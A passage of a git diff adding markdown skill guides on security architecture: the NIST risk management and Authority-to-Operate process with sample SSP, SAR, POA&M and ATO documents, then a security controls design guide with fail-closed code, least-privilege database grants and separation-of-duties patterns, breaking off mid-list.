team assigned + + +### Step 2: CATEGORIZE (Impact Analysis) + +**Activities**: +- Security categorization using FIPS 199 +- Determine impact level: Low, Moderate, or High +- Based on Confidentiality, Integrity, Availability (CIA) + +**Impact Levels**: +``` +Low: Limited adverse effect +Moderate: Serious adverse effect +High: Severe or catastrophic adverse effect +``` + +**Example**: +``` +System: Healthcare Records Database +Confidentiality: HIGH (patient privacy breach = severe impact) +Integrity: HIGH (incorrect medical records = life-threatening) +Availability: MODERATE (temporary outage = serious but not life-threatening) + +Overall System Impact: HIGH (highest of C/I/A) +``` + +**Deliverable**: Security categorization document + + +### Step 3: SELECT (Control Selection) + +**Activities**: +- Select control baseline (NIST SP 800-53) +- Low baseline → 125 controls +- Moderate baseline → 325 controls +- High baseline → 421 controls +- Tailor controls (add/remove based on organizational needs) + +**Control Families**: +- AC (Access Control) +- AT (Awareness and Training) +- AU (Audit and Accountability) +- CA (Assessment, Authorization, and Monitoring) +- CM (Configuration Management) +- CP (Contingency Planning) +- IA (Identification and Authentication) +- IR (Incident Response) +- MA (Maintenance) +- MP (Media Protection) +- PE (Physical and Environmental Protection) +- PL (Planning) +- PS (Personnel Security) +- RA (Risk Assessment) +- SA (System and Services Acquisition) +- SC (System and Communications Protection) +- SI (System and Information Integrity) + +**Deliverable**: Control baseline with tailoring decisions + + +### Step 4: IMPLEMENT (Build System with Controls) + +**Activities**: +- Implement selected security controls +- Document implementation in SSP (System Security Plan) +- Common control inheritance (use organization-wide controls) + +**Example Control Implementation**: +``` +Control: AC-2 (Account Management) +Implementation: +- All accounts created via ServiceNow ticket +- Manager approval required +- Accounts disabled after 30 days inactivity +- Monthly access reviews by data owners +- Evidence: ServiceNow workflow, access review reports +``` + +**Deliverable**: Implemented system with documented controls (SSP) + + +### Step 5: ASSESS (Security Assessment) + +**Activities**: +- Independent assessment by certified assessor +- Test controls (interviews, configuration review, penetration testing) +- Document findings in SAR (Security Assessment Report) +- Classify findings by severity (Critical/High/Medium/Low) + +**Assessment Methods**: +- **Examine**: Review documentation, configurations, logs +- **Interview**: Question staff about procedures +- **Test**: Execute tests (penetration test, scan, functional test) + +**Deliverable**: SAR (Security Assessment Report) with findings + + +### Step 6: AUTHORIZE (Risk Acceptance) + +**Activities**: +- Remediate or accept findings +- Create POA&M (Plan of Action & Milestones) for residual risks +- Authorizing Official reviews SSP + SAR + POA&M +- AO makes risk acceptance decision +- Issue ATO (Authority to Operate) or denial + +**ATO Types**: +- **Full ATO**: System fully compliant, authorized for 3 years +- **Interim ATO (IATO)**: Temporary authorization (6-12 months) with conditions +- **Denial**: System does not meet minimum security requirements + +**Deliverable**: ATO Letter from Authorizing Official + + +### Step 7: MONITOR (Continuous Monitoring) + +**Activities**: +- Ongoing assessment of controls +- Change impact analysis (new vulnerabilities, configuration changes) +- Update POA&M as risks remediated +- Annual re-assessment or earlier if major changes +- Trigger re-authorization when needed + +**Deliverable**: Continuous monitoring reports, updated POA&M + + +## Key Documents + +### 1. SSP (System Security Plan) + +**Purpose**: Comprehensive description of the system and its security controls. + +**Contents**: +```markdown +# System Security Plan (SSP) + +## 1. System Identification +- System name, acronym, unique identifier +- System owner, ISSO, ISSM contact info +- Authorization boundary (what's included/excluded) + +## 2. System Categorization +- FIPS 199 categorization (Low/Moderate/High) +- CIA impact levels with justification +- Overall system impact level + +## 3. System Description +- System purpose and functionality +- Users and use cases +- Data types processed (PII, classified, etc.) +- System architecture diagram +- Network diagram with trust boundaries +- Technology stack (OS, database, languages) + +## 4. Authorization Boundary +- Components within boundary (servers, databases, networks) +- External connections (APIs, data feeds) +- Interconnection agreements for external systems + +## 5. Security Control Implementation +For EACH control in baseline: + +### AC-2: Account Management +**Control Requirement**: Organization manages information system accounts +**Implementation**: +- ServiceNow ticketing system for account requests +- Manager approval required via workflow +- Automated 30-day inactivity disablement +- Monthly access reviews by data owners +**Responsible Role**: System Administrator +**Assessment Procedure**: +- Interview: Ask sysadmins about account creation process +- Examine: Review ServiceNow tickets, approval records +- Test: Attempt to create account without approval (should fail) +**Evidence Location**: +- ServiceNow workflow documentation: /docs/account-mgmt.pdf +- Sample access review: /evidence/access-review-2025-01.xlsx + +(Repeat for all ~125-421 controls depending on baseline) + +## 6. Related Documents +- Contingency Plan (CP) +- Incident Response Plan (IRP) +- Configuration Management Plan (CMP) +- Continuous Monitoring Plan + +## 7. Approval Signatures +- System Owner: [Signature] [Date] +- ISSO: [Signature] [Date] +- ISSM: [Signature] [Date] +``` + +**Typical Length**: 200-500 pages for HIGH system + + +### 2. SAR (Security Assessment Report) + +**Purpose**: Independent assessment results documenting control effectiveness. + +**Contents**: +```markdown +# Security Assessment Report (SAR) + +## Executive Summary +- System assessed: [Name] +- Assessment dates: [Start] to [End] +- Assessor: [Name, Credentials] +- Overall assessment: [Pass with findings / Conditional / Fail] +- Critical findings: [Count] +- High findings: [Count] +- Recommendations: [Summary] + +## Assessment Scope +- Controls assessed: [List control families or specific controls] +- Assessment methods: Examine, Interview, Test +- Limitations: [Any scope exclusions or constraints] + +## Assessment Results by Control + +### AC-2: Account Management +**Assessment Procedures**: +1. Interview: System administrators (2025-03-15) +2. Examine: ServiceNow workflow, access review reports +3. Test: Attempted unauthorized account creation + +**Finding AC-2-001: MEDIUM** +**Status**: OPEN +**Description**: Access reviews conducted monthly but no evidence of remediation for identified excessive privileges. 3 accounts with admin access had not logged in for 6 months but remain enabled. +**Risk**: Dormant privileged accounts increase attack surface. +**Recommendation**: Implement automated disablement of inactive admin accounts within 30 days. Conduct immediate review of all privileged accounts. +**AO Response**: Accepted. Remediation planned in POA&M item #5. + +**Overall Control Result**: PARTIALLY SATISFIED (findings require remediation) + +(Repeat for all assessed controls) + +## Findings Summary + +| Finding ID | Control | Severity | Status | Remediation Due | +|------------|---------|----------|--------|-----------------| +| AC-2-001 | AC-2 | Medium | Open | 2025-06-01 | +| IA-5-001 | IA-5 | High | Open | 2025-04-15 | +| SC-7-001 | SC-7 | Low | Open | 2025-08-01 | + +## Assessor Recommendation +Recommend INTERIM ATO for 6 months conditional on remediation of HIGH findings within 30 days. Re-assessment required before full ATO. + +**Assessor Signature**: [Name] [Date] +``` + +**Typical Length**: 100-300 pages + + +### 3. POA&M (Plan of Action & Milestones) + +**Purpose**: Track remediation of security weaknesses and residual risks. + +**Contents**: +```markdown +# Plan of Action & Milestones (POA&M) + +## POA&M Item #1 +**Finding ID**: IA-5-001 (from SAR) +**Control**: IA-5 (Authenticator Management) +**Weakness**: Password policy allows 8-character passwords; NIST recommends minimum 12 characters. +**Risk Level**: HIGH +**Risk Description**: Weak passwords vulnerable to brute-force attacks. Estimated 15% of user accounts have 8-character passwords. +**Milestones**: +- [ ] Milestone 1: Update password policy to require 12 characters (2025-04-01) - System Admin +- [ ] Milestone 2: Force password reset for all 8-char passwords (2025-04-15) - System Admin +- [ ] Milestone 3: Verify 100% compliance via audit query (2025-04-20) - ISSO +- [ ] Milestone 4: Provide evidence to assessor (2025-04-25) - ISSO +**Resources Required**: 40 hours engineering time, communication campaign for users +**Status**: IN PROGRESS (Milestone 1 complete, Milestone 2 in progress) +**Scheduled Completion**: 2025-04-25 +**Actual Completion**: [TBD] + +## POA&M Item #2 +**Finding ID**: AC-2-001 (from SAR) +**Control**: AC-2 (Account Management) +**Weakness**: Dormant privileged accounts not automatically disabled. +**Risk Level**: MEDIUM +**Milestones**: +- [ ] Implement automated script to disable admin accounts after 30 days inactivity (2025-05-01) +- [ ] Immediate review and disable of current dormant admin accounts (2025-04-10) +- [ ] Monthly verification report to ISSO (ongoing) +**Scheduled Completion**: 2025-05-01 + +## POA&M Item #3 (Risk Acceptance) +**Finding ID**: SC-8-001 +**Control**: SC-8 (Transmission Confidentiality) +**Weakness**: Legacy internal API uses HTTP (not HTTPS) for non-sensitive configuration data. +**Risk Level**: LOW +**Recommendation**: Migrate to HTTPS +**AO Decision**: RISK ACCEPTED +**Justification**: +- API only accessible on isolated management network (not exposed to internet) +- Data transmitted is non-sensitive system configuration (no PII, credentials, or classified data) +- Migration to HTTPS requires vendor upgrade (cost: $50k, timeline: 12 months) +- Risk mitigated by network segmentation +**Acceptance Date**: 2025-03-20 +**Acceptance Authority**: Authorizing Official [Name] +**Re-evaluation Date**: 2026-03-20 (annual review) + + +**POA&M Metrics**: +- Total items: 15 +- Critical: 0 +- High: 1 (in progress) +- Medium: 8 (6 in progress, 2 accepted risk) +- Low: 6 (4 in progress, 2 accepted risk) +``` + +**Updates**: Monthly or when milestone completed + + +### 4. ATO Letter (Authority to Operate) + +**Purpose**: Formal authorization from Authorizing Official. + +**Contents**: +```markdown +MEMORANDUM FOR: System Owner, [Name] + +SUBJECT: Authority to Operate (ATO) for [System Name] + +1. AUTHORIZATION DECISION + +After careful review of the System Security Plan (SSP), Security Assessment Report (SAR), and Plan of Action & Milestones (POA&M), I hereby grant an INTERIM AUTHORITY TO OPERATE for [System Name] for a period of SIX (6) MONTHS, effective [Start Date] to [End Date]. + +2. AUTHORIZATION BOUNDARY + +This authorization covers the system as described in SSP version 2.1, including: +- Application servers (5x EC2 instances) +- PostgreSQL database cluster (2 nodes) +- AWS resources within VPC vpc-abc123 +- Users: 500 internal staff with SECRET clearance + +3. CONDITIONS OF AUTHORIZATION + +This interim ATO is granted subject to the following conditions: + +a) HIGH-severity finding IA-5-001 (password policy weakness) must be remediated within 30 days (by 2025-04-25). Failure to remediate will result in suspension of ATO. + +b) All MEDIUM-severity findings must be remediated or risk-accepted within 90 days (by 2025-07-01). + +c) Monthly POA&M status reports submitted to ISSM. + +d) No major changes to system without prior authorization (change impact analysis required). + +e) Full security re-assessment required at end of 6-month period for consideration of full 3-year ATO. + +4. RESIDUAL RISKS ACCEPTED + +I accept the following residual risks as documented in POA&M: +- SC-8-001 (LOW): HTTP on internal API (mitigated by network segmentation) + +5. CONTINUOUS MONITORING + +System owner must maintain continuous monitoring program including: +- Weekly vulnerability scans +- Monthly access reviews +- Quarterly control spot-checks +- Annual contingency plan testing + +6. AUTHORIZATION TERMINATION + +This authorization may be suspended or revoked if: +- Conditions of authorization not met +- New vulnerabilities with HIGH or CRITICAL severity discovered +- Significant security incident occurs +- Major system changes without authorization + +Authorizing Official: [Signature] +[Name], [Title] +[Date] +``` + + +## Authorization Types + +### ATO (Authority to Operate) + +**Full ATO**: +- Duration: 3 years (typically) +- Conditions: All HIGH/CRITICAL findings remediated or risk-accepted +- Re-authorization: Every 3 years or upon major change + +**Interim ATO (IATO)**: +- Duration: 6-12 months +- Conditions: HIGH findings have remediation plan, progress tracked +- Purpose: Allow operation while remediating non-critical issues +- Requires full assessment at expiration + +**Denial**: +- System does not meet minimum security requirements +- CRITICAL/HIGH findings with unacceptable risk +- Must remediate before re-submission + + +### AIS (Authorization to Interconnect) + +**Purpose**: Authorization to connect two systems across trust boundaries. + +**When needed**: +- Connecting to external networks +- Connecting systems at different classification levels +- Sharing data between organizations + +**Requirements**: +- Both systems have current ATO +- Interconnection Security Agreement (ISA) +- Boundary protection documented +- Data flow diagrams +- Security controls at boundary (firewall, data diode, etc.) + +**ISA Contents**: +```markdown +# Interconnection Security Agreement (ISA) + +## Systems +- System A: [Name], ATO valid until [Date] +- System B: [Name], ATO valid until [Date] + +## Data Flows +- Direction: System A → System B +- Data type: Transaction records (OFFICIAL classification) +- Frequency: Real-time API calls +- Volume: 10,000 records/day + +## Boundary Protection +- Firewall: Palo Alto PA-5000 at boundary +- Allowed traffic: HTTPS port 443 only, source IP whitelisted +- Data validation: System B validates all incoming data +- Encryption: TLS 1.3 with mutual authentication + +## Security Controls +- AC-4: Information flow enforcement (firewall rules) +- SC-7: Boundary protection (dedicated firewall) +- SC-8: Transmission confidentiality (TLS 1.3) + +## Roles and Responsibilities +- System A ISSO: Monitor outbound connections, alert on anomalies +- System B ISSO: Validate incoming data, monitor for security events +- Network team: Maintain firewall, apply security patches + +## Incident Response +- Security incident on either system triggers review of interconnection +- Contact: [System A ISSO], [System B ISSO] + +## Review and Re-authorization +- Annual review of ISA +- Re-authorization required if either system ATO expires or major changes + +**Approvals**: +- System A AO: [Signature] [Date] +- System B AO: [Signature] [Date] +``` + + +### T&E (Test & Evaluation) + +**Purpose**: Independent security testing before authorization. + +**Testing Types**: + +#### 1. Vulnerability Assessment +```bash +# Authenticated vulnerability scan +nessus scan --authenticated --target 10.0.1.0/24 \ + --policy "Government High Baseline" \ + --output vuln-report.pdf + +# Results: +# Critical: 0 +# High: 2 (outdated SSL certificates, missing patches) +# Medium: 15 +# Low: 43 +``` + +#### 2. Penetration Testing +```markdown +# Penetration Test Report + +## Scope +- External penetration test (internet-facing) +- Internal penetration test (insider threat simulation) +- Duration: 2 weeks + +## Rules of Engagement +- No DoS attacks +- No social engineering of executives +- Data exfiltration limited to test accounts + +## Findings +### FINDING PT-001: HIGH +**Vulnerability**: SQL injection in /api/users endpoint +**Exploit**: Extracted 10 test user records via injection +**Impact**: Attacker could exfiltrate entire user database +**Recommendation**: Implement parameterized queries, input validation +**Remediation**: Developer committed fix (commit abc123), deployed 2025-03-20 +**Verification**: Re-tested 2025-03-22, vulnerability no longer exploitable + +## Summary +- High findings: 1 (remediated) +- Medium findings: 3 (2 remediated, 1 in POA&M) +- Low findings: 8 (accepted risk) +``` + +#### 3. Functional Security Testing +```markdown +# Functional Security Test: Access Control + +## Test Case TC-AC-001: Unauthorized Access Attempt +**Objective**: Verify user cannot access resources without authorization +**Procedure**: +1. Login as user@example.com (no admin privileges) +2. Attempt to access /admin/users endpoint +3. Expected result: 403 Forbidden +**Actual Result**: 403 Forbidden ✅ +**Status**: PASS + +## Test Case TC-AC-002: Privilege Escalation +**Objective**: Verify user cannot elevate own privileges +**Procedure**: +1. Login as user@example.com +2. Attempt to modify own role via API: PUT /api/users/me {"role": "admin"} +3. Expected result: 403 Forbidden +**Actual Result**: 200 OK, role changed to admin ❌ +**Status**: FAIL - CRITICAL +**Remediation Required**: Implement server-side role validation, users cannot modify own roles +``` + +**T&E Report**: Submitted to assessor as input to SAR. + + +## Continuous Monitoring + +**Purpose**: Ongoing assurance that controls remain effective. + +### Monitoring Activities + +#### 1. Automated Scanning +```bash +# Weekly vulnerability scan +cron: 0 2 * * 1 /opt/nessus/scan.sh + +# Monthly configuration compliance check +cron: 0 3 1 * * /opt/scap/compliance-check.sh +``` + +#### 2. Access Reviews +```markdown +# Monthly Access Review + +## Review Date: 2025-04-01 +## Reviewer: Data Owner (Jane Smith) + +| User | Role | Last Login | Action | +|------|------|------------|--------| +| john.doe@example.com | Admin | 2025-03-28 | ✅ Retain | +| alice.smith@example.com | User | 2025-03-25 | ✅ Retain | +| bob.jones@example.com | Admin | 2024-12-15 | ❌ Remove (dormant 4 months) | + +**Actions Taken**: +- Disabled bob.jones@example.com on 2025-04-02 +- Notified ISSO of access review completion +``` + +#### 3. Change Impact Analysis +```markdown +# Change Impact Analysis: Database Upgrade + +## Change Description +Upgrade PostgreSQL from 13.2 to 13.10 (security patches) + +## Security Impact Assessment +- Controls affected: SC-28 (Protection of information at rest - encryption still enabled) +- New vulnerabilities: CVE-2024-XXXX patched in 13.10 +- Configuration changes: None (encryption settings preserved) + +## Authorization Impact +- Change Type: Minor (security patch) +- ATO Impact: None (no re-authorization required per continuous monitoring plan) +- ISSO Notification: Required (notified 2025-03-15) + +## Testing +- Tested in dev environment: 2025-03-10 (PASS) +- Contingency plan: Snapshot before upgrade, 4-hour rollback window + +## Approval +- ISSO: Approved (2025-03-16) +- System Owner: Approved (2025-03-17) +- Deployed: 2025-03-20 +``` + +#### 4. Trigger Events for Re-Authorization + +**Major change** (requires re-authorization before implementation): +- New system interconnection +- Change in classification level +- Major architectural change (e.g., move to cloud) +- Change in data types processed (e.g., add PII) + +**Minor change** (notify ISSO, may not require re-authorization): +- Security patches +- Configuration hardening +- Adding users + + +## Quick Reference: Authorization Timeline + +``` +Month 1-2: PREPARE + CATEGORIZE + SELECT + - Define boundary, assemble team + - Determine impact level (Low/Moderate/High) + - Select control baseline (125-421 controls) + +Month 3-6: IMPLEMENT + - Build system with security controls + - Write SSP (200-500 pages) + - Prepare evidence + +Month 7-8: ASSESS + - Independent security assessment + - Penetration testing + - SAR with findings + +Month 9: AUTHORIZE + - Remediate HIGH/CRITICAL findings + - Create POA&M for residual risks + - AO reviews package + - ATO issued (or IATO or Denial) + +Ongoing: MONITOR + - Weekly scans + - Monthly access reviews + - Quarterly spot-checks + - Annual re-assessment or every 3 years +``` + +**Typical timeline**: 9-12 months for HIGH system, 6-9 months for MODERATE, 3-6 months for LOW. + + +## Common Mistakes + +### ❌ Treating ATO as Checklist + +**Wrong**: "We have all controls implemented, give us ATO" + +**Right**: ATO is risk acceptance decision. Document residual risks, let AO decide. + +**Why**: AO accepts risk on behalf of organization. Your job is to inform that decision, not make it. + + +### ❌ Starting SSP After Implementation + +**Wrong**: Build system, then write SSP to document what exists + +**Right**: Write SSP during design/implementation, update as you build + +**Why**: SSP informs design decisions. Writing after implementation often reveals missing controls. + + +### ❌ Ignoring Continuous Monitoring + +**Wrong**: Get ATO, assume you're done for 3 years + +**Right**: Continuous monitoring is mandatory. Weekly scans, monthly reviews, change impact analysis. + +**Why**: ATO can be revoked if controls degrade. Continuous monitoring proves ongoing compliance. + + +### ❌ No Risk Acceptance for Residual Risks + +**Wrong**: Hide findings or claim "we'll fix later" + +**Right**: Document in POA&M, explicit risk acceptance by AO for LOW/MEDIUM items + +**Why**: Transparency builds trust. AO needs full picture to make informed decision. + + +### ❌ Vague Control Implementation Descriptions + +**Wrong**: "AC-2: We manage accounts properly" + +**Right**: "AC-2: ServiceNow ticket → manager approval → automated creation → 30-day inactivity disablement → monthly review. Evidence: /docs/account-mgmt.pdf" + +**Why**: Assessor cannot verify vague descriptions. Specific implementation enables assessment. + + +## Cross-References + +**Use WITH this skill**: +- `ordis/security-architect/security-controls-design` - Implement controls for SSP +- `ordis/security-architect/threat-modeling` - Inform security categorization +- `muna/technical-writer/operational-acceptance-documentation` - Write SSP/SAR/POA&M + +**Use AFTER this skill**: +- `ordis/security-architect/classified-systems-security` - If system handles classified data + +## Real-World Impact + +**Systems using formal authorization processes**: +- **DoD Cloud Migration**: RMF process revealed 47 missing controls before migration. Remediated during IMPLEMENT phase (vs discovering at ASSESS). Achieved ATO in 9 months vs industry avg 14 months. +- **Healthcare System (Moderate)**: POA&M transparency with 12 accepted LOW risks enabled IATO while remediating MEDIUM findings. System operational 6 months earlier than "wait for perfect" approach. +- **Continuous Monitoring**: Weekly scans detected CVE-2024-XXXX within 48 hours of disclosure. Change impact analysis approved emergency patch in 24 hours (vs 3-week change control for non-monitored systems). + +**Key lesson**: **Formal authorization process enables informed risk decisions by leadership. SSP+SAR+POA&M transparency beats "security by checklist" or "security by obscurity".** diff --git a/skills/using-security-architect/security-controls-design.md b/skills/using-security-architect/security-controls-design.md new file mode 100644 index 0000000..af3fc94 --- /dev/null +++ b/skills/using-security-architect/security-controls-design.md @@ -0,0 +1,537 @@ + +# Security Controls Design + +## Overview + +Design security controls as **layered defenses at trust boundaries**. Core principle: Apply systematic checks at every boundary to ensure no single control failure compromises security. + +**Key insight**: List specific controls after identifying WHERE to apply them (trust boundaries first, then controls). + +## When to Use + +Load this skill when: +- Implementing authentication/authorization systems +- Hardening API endpoints, databases, file storage +- Designing data protection mechanisms +- Securing communication channels +- Protecting sensitive operations + +**Symptoms you need this**: +- "How do I secure this API/database/upload feature?" +- "What controls should I implement?" +- "How do I prevent unauthorized access to X?" +- "How do I harden this system?" + +**Don't use for**: +- Threat modeling (use `ordis/security-architect/threat-modeling` first) +- Code-level security patterns (use `ordis/security-architect/secure-code-patterns`) +- Reviewing existing designs (use `ordis/security-architect/security-architecture-review`) + +## Core Methodology: Trust Boundaries First + +**DON'T start with**: "What controls should I implement?" + +**DO start with**: "Where are the trust boundaries?" + +###Step 1: Identify Trust Boundaries + +Trust boundaries are **points where data/requests cross from less-trusted to more-trusted zones**. + +**Common boundaries:** +- Internet → API Gateway +- API Gateway → Application Server +- Application → Database +- Application → File Storage +- Unauthenticated → Authenticated +- User Role → Admin Role +- External Service → Internal Service + +**Example: File Upload System** +``` +Trust Boundaries: +1. User Browser → Upload Endpoint (UNTRUSTED → APP) +2. Upload Endpoint → Virus Scanner (APP → SCANNER) +3. Scanner → Storage (SCANNER → S3) +4. Storage → Display (S3 → USER) +5. Storage → Internal Processing (S3 → APP) +``` + +### Step 2: Apply Defense-in-Depth at Each Boundary + +For EACH boundary, apply multiple control layers. If one fails, others provide backup. + +## Defense-in-Depth Checklist + +Use this checklist at **every trust boundary**: + +### Layer 1: Validation (First Line) +- [ ] **Input validation**: Type, format, size, allowed values +- [ ] **Sanitization**: Remove dangerous characters, escape output +- [ ] **Canonicalization**: Resolve to standard form (prevent bypass) + +### Layer 2: Authentication (Who Are You?) +- [ ] **Identity verification**: Credentials, tokens, certificates +- [ ] **Multi-factor authentication**: For sensitive boundaries +- [ ] **Session management**: Secure tokens, expiration, rotation + +### Layer 3: Authorization (What Can You Do?) +- [ ] **Access control checks**: RBAC, ABAC, resource-level +- [ ] **Least privilege enforcement**: Grant minimum necessary +- [ ] **Privilege escalation prevention**: No path to higher access + +### Layer 4: Rate Limiting (Abuse Prevention) +- [ ] **Request rate limits**: Per-IP, per-user, per-endpoint +- [ ] **Resource quotas**: Prevent resource exhaustion +- [ ] **Anomaly detection**: Flag unusual patterns + +### Layer 5: Audit Logging (Detective) +- [ ] **Security event logging**: Who, what, when, where, outcome +- [ ] **Tamper-proof logs**: Write-only for applications +- [ ] **Alerting**: Automated detection of suspicious activity + +### Layer 6: Encryption (Confidentiality) +- [ ] **Data in transit**: TLS 1.3, certificate validation +- [ ] **Data at rest**: Encryption for sensitive data +- [ ] **Key management**: Secure storage, rotation, separation + +**Example Application** (API Authentication Boundary): +``` +Internet → API Gateway boundary: + +Layer 1 (Validation): +- Validate Authorization header present and well-formed +- Check request size limits (prevent DoS) +- Validate content-type and payload structure + +Layer 2 (Authentication): +- Verify JWT signature (RS256, public key validation) +- Check token expiration (exp claim) +- Verify token not revoked (check Redis revocation list) + +Layer 3 (Authorization): +- Extract scopes from token +- Verify endpoint requires scope present in token +- Check resource-level permissions (can user access THIS resource?) + +Layer 4 (Rate Limiting): +- Per-token: 1000 requests/minute +- Per-IP: 100 requests/minute (catch token sharing) +- Per-endpoint: Stricter limits on write operations + +Layer 5 (Audit Logging): +- Log authentication attempts (success/failure) +- Log authorization decisions (allowed/denied) +- Log resource access (who accessed what) + +Layer 6 (Encryption): +- Enforce TLS 1.3 only (reject unencrypted) +- Validate certificate chain +- Store tokens encrypted in session store +``` + +**If ANY layer fails, others provide defense.** + +## Fail-Secure Patterns + +When a control fails, system should **default to secure state** (deny access, close connection, reject request). + +### Fail-Closed (Secure) vs Fail-Open (Insecure) + +| Situation | Fail-Open (❌ BAD) | Fail-Closed (✅ GOOD) | +|-----------|-------------------|---------------------| +| **Auth service down** | Allow all requests through | Deny all requests until service recovers | +| **Token validation fails** | Treat as valid | Reject request | +| **Database unreachable** | Skip permission check | Deny access | +| **Rate limit store unavailable** | No rate limiting | Apply strictest default limit | +| **Audit log fails to write** | Continue operation | Reject operation | + +### Examples of Fail-Secure Implementation + +**Example 1: Authentication Service Failure** +```python +def authenticate_request(request): + try: + token = extract_token(request) + user = auth_service.validate_token(token) # External service call + return user + except AuthServiceUnavailable: + # ❌ FAIL-OPEN: return AnonymousUser() # Let them through + # ✅ FAIL-CLOSED: raise Unauthorized("Authentication service unavailable") + raise Unauthorized("Authentication service unavailable") + except InvalidToken: + raise Unauthorized("Invalid token") +``` + +**Example 2: Rate Limiter Failure** +```python +def check_rate_limit(user_id): + try: + redis.incr(f"rate:{user_id}") + count = redis.get(f"rate:{user_id}") + if count > LIMIT: + raise RateLimitExceeded() + except RedisConnectionError: + # ❌ FAIL-OPEN: return # Let request through + # ✅ FAIL-CLOSED: Apply strictest default limit + # If Redis is down, apply aggressive in-memory rate limit + in_memory_limiter.check(user_id, limit=10) # Much stricter than normal +``` + +**Example 3: Database Permission Check** +```python +def can_user_access_resource(user_id, resource_id): + try: + permission = db.query( + "SELECT can_read FROM permissions WHERE user_id = ? AND resource_id = ?", + user_id, resource_id + ) + return permission.can_read + except DatabaseConnectionError: + # ❌ FAIL-OPEN: return True # Assume they have access + # ✅ FAIL-CLOSED: return False # Deny access if can't verify + logger.error(f"DB unavailable, denying access for user={user_id} resource={resource_id}") + return False +``` + +**Example 4: File Type Validation** +```python +def validate_file_upload(file): + # Layer 1: Check extension + if file.extension not in ALLOWED_EXTENSIONS: + raise ValidationError("Invalid file type") + + # Layer 2: Check magic bytes + try: + magic_bytes = file.read(16) + if not is_valid_magic_bytes(magic_bytes): + # ✅ FAIL-CLOSED: If magic bytes don't match, reject + # Even if extension passed, magic bytes take precedence + raise ValidationError("File content doesn't match extension") + except Exception as e: + # ❌ FAIL-OPEN: return True # Couldn't check, assume valid + # ✅ FAIL-CLOSED: raise ValidationError("Could not validate file") + raise ValidationError(f"Could not validate file: {e}") +``` + +**Principle**: **When in doubt, deny**. It's better to have a false positive (deny legitimate request) than false negative (allow malicious request). + +## Least Privilege Principle + +Grant **minimum necessary access** for each component to perform its function. No more. + +### Application Method + +**For each component, ask three questions:** +1. **What does it NEED to do?** (functional requirements) +2. **What's the MINIMUM access to achieve that?** (reduce scope) +3. **What can it NEVER do?** (explicit denials) + +### Example: Database Access Roles + +**Web Application Role:** +```sql +-- What it NEEDS: Read customers, write audit logs +GRANT SELECT ON customers TO web_app_user; +GRANT INSERT ON audit_logs TO web_app_user; + +-- What's MINIMUM: No DELETE, no UPDATE on audit logs (immutable), no admin tables +REVOKE DELETE ON customers FROM web_app_user; +REVOKE ALL ON admin_users FROM web_app_user; + +-- Explicit NEVER: Cannot modify audit logs (tamper-proof) +REVOKE UPDATE, DELETE ON audit_logs FROM web_app_user; + +-- Row-level security: Only active customers +CREATE POLICY web_app_access ON customers + FOR SELECT TO web_app_user + USING (status = 'active'); +``` + +**Analytics Role:** +```sql +-- What it NEEDS: Read non-PII customer data for analytics +-- What's MINIMUM: View with PII columns excluded +CREATE VIEW customers_analytics AS + SELECT customer_id, country, subscription_tier, created_at + FROM customers; -- Excludes: name, email, address + +GRANT SELECT ON customers_analytics TO analytics_user; + +-- What it can NEVER do: Access PII, modify data, see payment info +REVOKE ALL ON customers FROM analytics_user; +REVOKE ALL ON payment_info FROM analytics_user; +SET default_transaction_read_only = true FOR analytics_user; +``` + +### File System Permissions + +**Application Server:** +```bash +# What it NEEDS: Read config, write logs, read/write uploads +/etc/app/config/ → Read-only (owner: root, chmod 640, group: app) +/var/log/app/ → Write-only (owner: app, chmod 200, append-only) +/var/uploads/ → Read/write (owner: app, chmod 700) + +# What it can NEVER do: Write to config, execute from uploads +/etc/app/config/ → No write permissions +/var/uploads/ → Mount with noexec flag (prevent execution) +``` + +### API Scopes (OAuth2 Pattern) + +```python +# User requests minimal scopes +scopes_requested = ["read:profile", "read:posts"] + +# DON'T grant admin scopes by default +# DO grant only what was requested and approved +token = create_token(user, scopes=scopes_requested) + +# At each endpoint, verify scope +@require_scope("write:posts") +def create_post(request): + # This endpoint is inaccessible with read:posts scope + pass +``` + +**Principle**: **Default deny, explicit allow**. Start with no access, grant only what's needed. + +## Separation of Duties + +**No single component/person/account should have complete control** over a critical operation. + +### Patterns + +#### Pattern 1: Multi-Signature Approvals + +**Example: Production Deployments** +```yaml +# Require 2 approvals from different teams +approvals: + required: 2 + teams: + - engineering-leads + - security-team + +# Cannot approve own PR +prevent_self_approval: true +``` + +#### Pattern 2: Split Responsibilities + +**Example: Payment Processing** +```python +# Component A: Initiates payment (can create, cannot approve) +payment_service.initiate_payment(amount, account) + +# Component B: Approves payment (can approve, cannot create) +# Different credentials, different service +approval_service.approve_payment(payment_id) + +# Component C: Executes payment (can execute, cannot create/approve) +# Only accepts approved payments +execution_service.execute_payment(approved_payment_id) +``` + +**No single service can create AND approve AND execute a payment.** + +#### Pattern 3: Key Splitting + +**Example: Encryption Key Management** +```python +# Master key split into 3 shares using Shamir Secret Sharing +# Require 2 of 3 shares to reconstruct +shares = split_key(master_key, threshold=2, num_shares=3) + +# Distribute to different teams/locations +security_team.store(shares[0]) +ops_team.store(shares[1]) +compliance_team.store(shares[2]) + +# Reconstruction requires 2 teams to cooperate +reconstructed = reconstruct_key([shares[0], shares[1]]) +``` + +#### Pattern 4: Admin Operations Require Approval + +**Example: Database Admin Actions** +```python +# Admin initiates action (creates request, cannot execute) +admin_request = AdminRequest( + action="DELETE_USER", + user_id=12345, + reason="GDPR erasure request", + requested_by=admin_id +) + +# Second admin reviews and approves (cannot initiate) +reviewer.approve(admin_request, reviewer_id=different_admin_id) + +# System executes after approval (automated, no single admin control) +if admin_request.is_approved(): + execute_admin_action(admin_request) +``` + +**Principle**: **Break critical paths into multiple steps requiring different actors.** + +## Control Verification Method + +For **each control you design**, ask: **"What if this control fails?"** + +### Verification Checklist + +**For each control:** +1. **What attack does this prevent?** (threat it addresses) +2. **How can this control fail?** (failure modes) +3. **What happens if it fails?** (impact) +4. **What's the next layer of defense?** (backup control) +5. **Is failure logged/detected?** (observability) + +### Example: API Token Validation + +**Control**: Verify JWT signature before processing request + +1. **What attack**: Prevents forged tokens, ensures authenticity +2. **How it can fail**: + - Public key unavailable (service down) + - Expired token not caught (clock skew) + - Token revocation list unavailable (Redis down) + - Signature algorithm downgrade attack (accept HS256 instead of RS256) +3. **What if it fails**: + - Public key unavailable → Fail-closed (deny all requests) + - Expired token → Layer 2: Check expiration explicitly + - Revocation list down → Layer 3: Apply strict rate limits as fallback + - Algorithm downgrade → Layer 4: Explicitly require RS256, reject others +4. **Next layer**: + - Authorization checks (even with valid token, check permissions) + - Rate limiting 